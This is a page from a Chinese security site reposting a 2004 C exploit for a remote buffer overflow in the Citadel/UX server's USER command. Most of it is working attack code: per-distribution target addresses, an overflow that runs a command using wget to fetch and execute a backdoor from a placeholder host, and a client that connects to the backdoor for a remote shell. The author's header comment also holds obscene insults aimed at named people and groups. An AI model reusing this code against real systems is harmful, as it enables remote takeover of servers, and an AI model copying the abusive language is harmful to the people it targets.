首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Citadel/UX <= 6.23 Remote USER directive Exp
来源:vfocus.net 作者:nebunu 发布时间:2004-09-11  

Citadel/UX <= 6.23 Remote USER directive Exploit (Private Version)

/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com

This is the version which contains targets,abuse it kiddies

Bruteforce:

You only have 4096/4=1024 tries.
The magic offset lies about 2048 + or - 4,8,16....256
So practically speaking you have maximum 256 tries.


Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have.

F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members,dont forget their moms.

My little private message:

Sa va bagam pule in gat celor de pe irc.apropo.ro,in special lui shell (nimeni) si toata
gasca de cacaciosi de la #rosec
Ce tupeu pe voi sa vreti donatii in e-gold..va dau eu donatii in sloboz..
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/*
Place here your own link which contains a backdoor (blackhole.c) which listens on port 12345
*/

#define COMMAND "cd /tmp;wget http://your-site-here.com/a;/tmp/a;"
#define BUFFER 93
#define CITADEL_PORT 504
#define RETADDR 0xbffff000
#define BACKDOOR_PORT 12345
#define MAXTARGETS 9


struct architecture
{
char *platform;
int syst;
}arch[]={
{"Red Hat 7.1 (Seawolf)",0x4006aef0},
{"Red Hat 7.2 (Enigma)",0x4006f664},
{"Red Hat 7.3 (Valhalla)",0x080482d0},
{"SuSE Linux 8.0",0x4006f004},
{"Debian sid unstable release",0x4005f270},
{"Slackware 8.0.0",0x40062870},
{"Slackware 9.0.0",0x40061530},
{"Slackware 9.1.0",0x4006be80},
{"SuSE Linux 8.0",0x4006f004},
};

void shell(int sock)
{
fd_set fd_read;
char buff[1024000], *cmd="cd /;uname -a;id\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read))
{
if((n = recv(sock, buff, sizeof(buff), 0)) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (write(1, buff, n) > 0);
}
if (FD_ISSET(0, &fd_read))
{
if((n = read(0, buff, sizeof(buff))) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
}
fprintf(stderr, "Connection lost.\n\n");
exit(0);
}


int fuck(char *fuck)
{
struct sockaddr_in addr2;
int sock2 = 0;
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
{
return -1;
}

addr2.sin_addr.s_addr=inet_addr(fuck);
addr2.sin_family = AF_INET;
addr2.sin_port = htons(BACKDOOR_PORT);
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1)
{
printf("\n\nExploit failed!\n\n");
return -1;
}
shell(sock2);
close(sock2);
return 0;
}

void exploit(char ip[16],int target,int tryy)
{
int i,sock,t,len,n;
char overflow[500],system[8],ret[8];
char egg[500];
int *pt;
int retaddr;
struct sockaddr_in addy;

retaddr=RETADDR+tryy;
memset(overflow,0,500);
memset(egg,0,500);
memset(ret,0,8);
memset(system,0,8);
for(i=0;i<(BUFFER-strlen(COMMAND));i++)
overflow[i]='/';
strcat(overflow,COMMAND);
pt=(int *)system;
for(i=0;i<4;i+=4)*pt++=arch[target].syst;
strcat(overflow,system);
strcat(overflow,"AAAA");
pt=(int *)ret;
for(i=0;i<4;i+=4)*pt++=retaddr;
strcat(overflow,ret);
strcpy(egg,"USER ");
strcat(egg,overflow);
strcat(egg,"\n");

sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1)
{
perror("socket()");
exit(-1);
}
addy.sin_family=AF_INET;
addy.sin_port=htons(CITADEL_PORT);
addy.sin_addr.s_addr=inet_addr(ip);
t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
if(t==-1)
{
perror("connect()");
exit(-1);
}
write(sock,egg,strlen(egg));
printf("%s\n",egg);
close(sock);
}

int main(int argc,char **argv)
{

int i,targ;
if(argc!=4)
{
printf("\r\nCitadel/UX remote exploit (private version) by nebunu <pppppppal at yahoo dot com>\r\n
Usage: %s <target ip> <target number> <offset [1..4096]>\r\n",argv[0]);
printf("\nAvailable targets:\n");
for(i=0;i<MAXTARGETS;i++)printf("\n%u) Platform %s,system=0x%x",i,arch[i].platform,arch[i].syst);
printf("\n");
exit(-1);
}


if(strlen(COMMAND)>92)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

targ=atoi(argv[2]);
printf("\r\nAttacking %s\n",arch[targ].platform);
exploit(argv[1],targ,atoi(argv[3]));
fuck(argv[1]);

}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·cdrdao local root exploit
·PHP-Nuke 7.4 SQL Injection Exp
·TorrentTrader 1.0 RC2 SQL Inje
·Trillian 0.74i Remote Buffer O
·Courier-IMAP <= 3.0.2-r1 au
·Citadel/UX<= 6.23 Remote US
·AOL Instant Messenger AIM "Awa
·Cdrecord Local Root Exploit
·注射MSSQL时解决的一个未有人提
·BlackJumboDog FTP Server Buffe
·WFTPD Pro Server 3.21 MLST Rem
·Cdrecord Local Exploit (SUID S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved